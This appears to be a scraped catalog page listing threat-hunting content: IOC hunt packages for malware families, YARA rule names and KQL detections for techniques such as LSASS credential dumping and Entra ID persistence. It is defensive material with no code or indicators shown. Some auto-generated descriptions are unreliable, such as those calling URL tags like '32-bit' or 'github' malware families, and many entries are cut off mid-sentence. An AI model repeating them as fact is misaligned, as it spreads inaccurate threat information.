CommonSecurityLogDeviceNetworkEventsUrlClickEvents
The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into a botnet for launching large-scale DDoS attacks. It typically arrives via network scans targeting vulnerable devices, often leveraging hardcoded IP:port combinations or malicious URLs to propagate. SOC
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 86 IOCs associated with ClearFake
ThreatFox: FAKEUPDATES IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with FAKEUPDATES
ThreatFox: magecart IOCs
ioc-hunt high
DnsEvents
Hunt package for 41 IOCs associated with magecart
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 7 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 15 IOCs associated with Unknown malware
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 13 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 17 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
DCRat is a remote access Trojan that enables attackers to execute commands, steal data, and maintain persistent access to compromised systems. It typically arrives via phishing emails, malicious attachments, or exploit kits leveraging network vulnerabilities to establish initial
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Havoc
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 4 IOCs associated with Nanocore RAT
ThreatFox: Nova Stealer IOCs
ioc-hunt high
UrlClickEvents
Hunt package for 2 IOCs associated with Nova Stealer
ThreatFox: Quasar RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 5 IOCs associated with Quasar RAT
ThreatFox: RansomHub IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with RansomHub
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with Remus
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting financial institutions and using persistence
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
VShell malware establishes persistent, encrypted communication with command-and-control servers via specific
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The "32-bit"
URLhaus: botnetdomain Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as botnetdomain
URLhaus: c2-monitor-auto Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as c2-monitor-auto
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 14 malicious URLs tagged as ClearFake
URLhaus: fbi.gov Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as fbi.gov
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The malware family "malware_download"
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as Mozi
URLhaus: opendir Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as opendir
T1078.004
Identifies service principal sign-ins from a country not present in the SP's sign-in history over the preceding 14 days. A new-country sign-in for a workload identity may indicate stolen client creden
T1059.001T1564.003T1200
DeviceProcessEvents
Identifies PowerShell spawned by explorer.exe with a hidden window and a remote-execution or evasion flag. Consistent with BadUSB HID injection opening the Windows Run dialog via WIN+R; the explorer.e
T1098T1078.004
AuditLogs
Identifies a single actor resetting passwords for three or more distinct accounts within one hour. Bulk admin-initiated resets in rapid succession suggest active account takeover before detection.
T1098T1098.003T1078.004
AuditLogs
Identifies accounts initiating high-impact Entra ID operations within 30 minutes of having their password reset by a different actor. Cross-actor correlation (ResetActorUpn != ResetTargetUpn) separate
Iron Tiger Malware - Toolkit ChangePort
dllshellexc2010 Exchange backdoor + remote shell
This rule detects a dns tunnel tool used in Operation Iron Tiger
Iron Tiger EFH3 Encoder
yara low
Iron Tiger EFH3 Encoder
Iron Tiger Malware - GetPassword x64
yara low
Iron Tiger Malware - GetPassword x64
Iron Tiger Malware - GetUserInfo
yara low
Iron Tiger Malware - GetUserInfo
This is a detection for a s.exe variant seen in Op. Iron Tiger
Iron Tiger Malware - GTalk Trojan
yara low
Iron Tiger Malware - GTalk Trojan
Iron Tiger Toolset - HTTP SOCKS Proxy soexe
Iron Tiger Malware - HTTPBrowser Dropper
Iron Tiger Malware - NBDDos Gh0stvariant Dropper
Iron Tiger Malware - PlugX DosEmulator
Iron Tiger Malware - PlugX FastProxy
yara low
Iron Tiger Malware - PlugX FastProxy
Iron Tiger Malware - PlugX Server
yara low
Iron Tiger Malware - PlugX Server
Iron Tiger Malware - ReadPWD86
yara low
Iron Tiger Malware - ReadPWD86
Iron Tiger Malware - Ring Gh0stvariant
Iron Tiger Tool - wmi.vbs detection
yara low
Iron Tiger Tool - wmi.vbs detection
KeyBoy Backdoor
yara low
YARA rule: KeyBoy_Backdoor
KeyBoy Dropper
yara low
YARA rule: KeyBoy_Dropper
T1528T1098.003
AuditLogs
Identifies service principals that received an app role assignment or admin consent within one hour of being registered in the tenant. Register-then-consent is a documented persistence pattern after p
T1562.001T1562.004T1011
ASimNetworkSessionLogsDeviceNetworkEventsimNetworkSession
Identifies outbound network connections logged by perimeter firewalls that are entirely missing from Microsoft Defender for Endpoint (MDE) telemetry. This discrepancy strongly indicates a threat actor
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1553.002T1588.003
Identifies files signed by certificates with a lifespan <= 14 days on non-developer endpoints. While legitimate software certs last 1+ years, ephemeral certs indicate Malware-Signing-as-a-Service (MSa
ThreatFox: Mirai IOCs
ioc-hunt high
UrlClickEvents
The Mirai malware family is a botnet that compromises IoT devices by scanning for default credentials and exploiting known vulnerabilities, then using infected devices to launch large-scale DDo
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 98 IOCs associated with ClearFake
ThreatFox: EtherRAT IOCs
ioc-hunt high
DnsEvents
EtherRAT is a remote access Trojan that enables attackers to exfiltrate data, execute commands, and maintain persistent control over infected systems. It typically arrives via phishing emails containing malicious links or attachments that download the malware to compromised endpoints. SOC analysts should monitor for unusual outbound network traffic, lateral
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 8 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DeviceFileEventsDnsEventsUrlClickEvents
Hunt package for 14 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEvents
Hunt package for 15 IOCs associated with Unknown malware
ThreatFox: Unknown Loader IOCs
ioc-hunt high
DeviceFileEvents
Hunt package for 3 IOCs associated with Unknown Loader
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
The "Unknown Stealer" malware is a data exfiltration tool designed to steal sensitive information such as credentials, cookies, and system files by establishing communication with command-and-control servers via domains and URLs. It typically arrives in environments through phishing
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 17 IOCs associated with Cobalt Strike
ThreatFox: Havoc IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Havoc
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
The Lumma Stealer malware is a data-exfiltration tool that steals sensitive information such as credentials, cryptocurrency wallets, and system files by leveraging compromised credentials or stolen tokens. It typically arrives via phishing emails, malicious websites, or exploit kits, often
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
DnsEvents
Hunt package for 4 IOCs associated with Nanocore RAT
ThreatFox: NetSupportManager RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 9 IOCs associated with NetSupportManager RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 9 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
DnsEvents
The
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 12 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with VShell
ThreatFox: XWorm IOCs
ioc-hunt high
DeviceFileEventsUrlClickEvents
XWorm is a multi-stage malware family designed to establish persistence, exfiltrate data, and execute arbitrary commands, often leveraging compromised credentials or stolen tokens for lateral movement. It typically arrives via phishing emails containing malicious URLs or bundled with legitimate software through supply chain attacks. SOC analysts
URLhaus: 176-65-139-196 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 176-65-139-196
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 35 malicious URLs tagged as 32-bit
URLhaus: arm Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as arm
URLhaus: base64 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as base64
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as ClearFake
URLhaus: dcrat Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Dcrat malware family is a remote access trojan (RAT) designed to exfiltrate sensitive data and provide attackers with persistent access to compromised systems. It typically arrives via phishing emails containing malicious URLs or through compromised websites that
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 19 malicious URLs tagged as elf
URLhaus: exe Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as exe
URLhaus: github Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The "github" malware family is
URLhaus: lnk Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as lnk
URLhaus: Lumma Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as Lumma
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 16 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as Mozi
URLhaus: remcos Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as remcos
apt hellsing implantstrings
yara low
YARA rule: apt_hellsing_implantstrings
apt hellsing installer
yara low
YARA rule: apt_hellsing_installer
apt hellsing irene
yara low
YARA rule: apt_hellsing_irene
apt hellsing msgertype2
yara low
YARA rule: apt_hellsing_msgertype2
apt hellsing proxytool
yara low
YARA rule: apt_hellsing_proxytool
apt hellsing xkat
yara low
YARA rule: apt_hellsing_xkat
HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
APT Hikit msrv
yara low
YARA rule: APT_Hikit_msrv
Entra ID named location deleted or modified
kql medium
T1562.001
AuditLogs
Identifies deletions or modifications to named locations in Entra ID, which may indicate an attacker weakening Conditional Access enforcement by removing trusted network definitions.
Federated domain added to Entra ID tenant
kql medium
T1484.002
AuditLogs
Identifies federation configuration changes to Entra ID domains, a persistence technique that allows attackers to forge authentication tokens for any user account in the tenant without knowing their p
T1098.001
AuditLogs
Identifies federated identity credential additions to Entra ID service principals. Workload identity federation allows external OIDC workloads to authenticate as the SP without secrets, which if abuse
T1574.002T1071T1573T1567
DeviceNetworkEvents
Identifies anomalous network communication from processes that have no historical baseline on a device.
High volume LSASS memory read
kql medium
T1003.001
DeviceEvents
This query identifies processes extracting an abnormally large volume of memory (>40MB) from LSASS. By focusing on physical bytes copied rather than process names, it detects credential dumping even i
ASPXSpy detection. It might be used by other fraudsters
Iron Tiger Malware - Changeport Toolkit driverinstall
Malware Updater
yara low
YARA rule: Malware_Updater
NK SSL PROXY
yara low
YARA rule: NK_SSL_PROXY
T1078.004
AuditLogs
Identifies Privileged Identity Management role activations outside business hours or on weekends, which may indicate unauthorized privilege escalation by a compromised account exploiting off-hours mon
Raw IP Address Used as URL Domain
kql medium
T1566T1566.002
EmailEventsEmailUrlInfo
Detects delivered inbound emails with URLs that use a raw IPv4 address as the domain. This pattern often indicates phishing or malware delivery designed to evade domain-based reputation checks.
Hacking Team RCS Backdoor
yara low
Hacking Team RCS Backdoor
Hacking Team RCS Scout
yara low
Hacking Team RCS Scout
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceNetworkEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
DeviceProcessEvents
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1219
Remote Monitoring and Management (RMM) programs are IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo
T1098.001
AuditLogs
Identifies service principal credential additions by users who received Application Administrator or Global Administrator roles within the preceding 24 hours, consistent with immediate post-compromise
T1003.001
DeviceEvents
This query identifies unauthorized interactive user accounts explicitly requesting highly privileged access masks against the LSASS process. It flags credential dumping attempts by standard users even
ThreatFox: Evilginx IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Evilginx
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 33 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 14 IOCs associated with KongTuke
ThreatFox: SmartApeSG IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 9 IOCs associated with SmartApeSG
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 7 IOCs associated with Unknown malware
ThreatFox: Unknown Loader IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with Unknown Loader
ThreatFox: Unknown RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with Unknown RAT
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 5 IOCs associated with Unknown Stealer
ThreatFox: Unknown Webinject IOCs
ioc-hunt high
DnsEvents
Hunt package for 5 IOCs associated with Unknown Webinject
ThreatFox: ACR Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 6 IOCs associated with ACR Stealer
ThreatFox: AdaptixC2 IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with AdaptixC2
ThreatFox: AsyncRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with AsyncRAT
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 17 IOCs associated with Cobalt Strike
ThreatFox: DCRat IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with DCRat
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 4 IOCs associated with Nanocore RAT
ThreatFox: PureRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
PureRAT is a remote access trojan that enables attackers to exfiltrate data, execute arbitrary commands, and maintain persistent control over infected systems. It typically arrives via phishing emails with malicious attachments
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Remcos
ThreatFox: Remus IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with Remus
ThreatFox: Sliver IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Sliver
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 54 IOCs associated with Vidar
ThreatFox: VShell IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 4 IOCs associated with VShell
Unauthorized Proxy Server RAT
yara low
YARA rule: Unauthorized_Proxy_Server_RAT
URLhaus: 176-65-139-99 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as 176-65-139-99
URLhaus: 176-65-148-69 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as 176-65-148-69
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 46 malicious URLs tagged as 32-bit
URLhaus: 45-83-31-225 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The malware associated with "45-
URLhaus: 45-92-1-35 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The malware family "45-92-1-35" is a downloader that exfiltrates data and establishes command-and-control (C2) communication
URLhaus: 84-54-33-84 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as 84-54-33-84
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as ClearFake
URLhaus: d52f85 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as d52f85
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 4 malicious URLs tagged as Mozi
URLhaus: opendir Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as opendir
